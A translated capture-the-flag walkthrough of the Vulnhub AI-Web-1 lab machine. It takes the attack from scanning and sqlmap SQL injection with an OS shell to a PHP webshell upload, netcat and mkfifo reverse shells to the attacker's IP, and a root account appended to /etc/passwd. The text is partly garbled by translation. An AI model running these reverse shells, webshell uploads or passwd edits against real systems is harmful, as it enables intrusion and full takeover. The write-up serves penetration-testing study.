Detailed explanation of Vulnhub target machine Web1 penetration test
Vulnhub target drone introduction:
Vulnhub is a comprehensive shooting range that provides various vulnerability platforms. You can download a variety of virtual machines for download. The local VM can be opened, and you can complete penetration testing, privilege escalation, vulnerability exploitation, code auditing and other interesting actual combat like a game.
This is a Web vulnerability target machine, as usual, you need to find the flag.
Vulnhub target drone download:
Official website address: https://www.vulnhub.com/entry/ai-web-1,353/
Vulnhub target machine installation:
After downloading, unzip the installation package and try VMware.
Detailed explanation of Vulnhub target drone vulnerability:
①: Information collection:
Use the netdiscoverdiscovery host in kali to
penetrate the machine: kali IP: 192.168.0.103 target machine IP: 192.168.0.104
Use the command:
nmap -sS -sV -A -n 192.168.0.104
Open the 80port and visit it first to see "He said that Google can't find it." Go directly to the tool and scan the background: dirb http://192.168.0.104
the web crawler protocol was found. robotsVisit to find two directories /m3diNf0/and access them /se3reTdir777/uploads/in turn.
Accessing the first path is that the 403page has no permission, and then accessing the second path does not have permission, and then use the command to scan again and dirb http://192.168.0.104/m3diNf0/
find the absolute path of the website, use the just dirbscan another path and /se3reTdir777/uploads/find oneindex.php
②: SQL injection:
It seems that there is sqlinjection in the access. You can also use it to manually test it. sqlmapLook at the fields first 1' order by 4#. If there is an echo, it means that there is a sql injection vulnerability.
I am lazy and like to use it sqlmapfirst to bpgrab a package to see the injected address:uid=1&Operation=Submit
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs #列出库
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables #列出表
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T user --columns #列出字段
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell #
Select php(default), custom location(s)and then enter the path just obtained:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
Obtained shellbut with low permissionswww-data
③: File upload:
Now you need to write a sentence for the Trojan horse sqlmapto create a new name under the path of the incoming server.hack.php
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write ./hack.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php
--file-write:去读取文件(hack.php)
--file-dest:后面加目标的绝对路径 已经生成木马的名称(hack.php)
Then visit http://192.168.0.104/se3reTdir777/uploads/hack.phpIf it is blank, it means that the uploaded Trojan was successful! ! Connect directly to the WebSelltool ant sword
④: Rebound shell:
1. Now kalilisten to the port usage command above: nc -lvvp 6666
2. nc -e /bin/bash 192.168.0.103 6666(Found that the -e parameter is unavailable)
3. Use the command: rm /tmp/f;mkfifo/tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.103 6666 >/tmp/f(bounced the shell)
4. Use the command: python -c "import pty;pty.spawn('/bin/bash')"(python write interaction)
⑤: Elevation of rights:
First use the command: find / -user root -perm -4000 -print 2>/dev/nulllook at which rootpermissions can be executed
. Look at the kernel version. Use the command: uname -athe current version number is. 4.15.0-58-generic 
searchsploit linux kernel 4.15.0-58-genericSearch the relevant kernel vulnerabilities and find that there are no files that can be exploited.
It is found that DC-9the same as the escalation method of , you can use adding an rootaccount to log in to escalate privileges. Please refer to the following link:
After reading this article, I will teach you to play the penetration test target machine vulnhub-DC9
Use the command: openssl passwd -1 -salt hacker 123456create an admin account
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd
⑥: Get flag:
At this point, the flag has been obtained, and the penetration test is over.
Vulnhub target penetration summary:
The new knowledge point here is ( sql--os--shellthe first time I use this)
and the format of . If /etc/passwdyou don’t understand it, it’s best to escalate the right one step. It is easy to make mistakes . Save it in a file . Allowing login is prohibiting shell login .)用户名:密码:UID(用户ID):GID(组ID):描述性信息:主目录:默认Shell"x"/etc/shadowshell/bin/bash/sbin/nologin
This time is a study of a web target drone. I hope you can also learn some new knowledge points and some penetration testing ideas. The final creation is not easy. Hope it will be helpful to everyone! !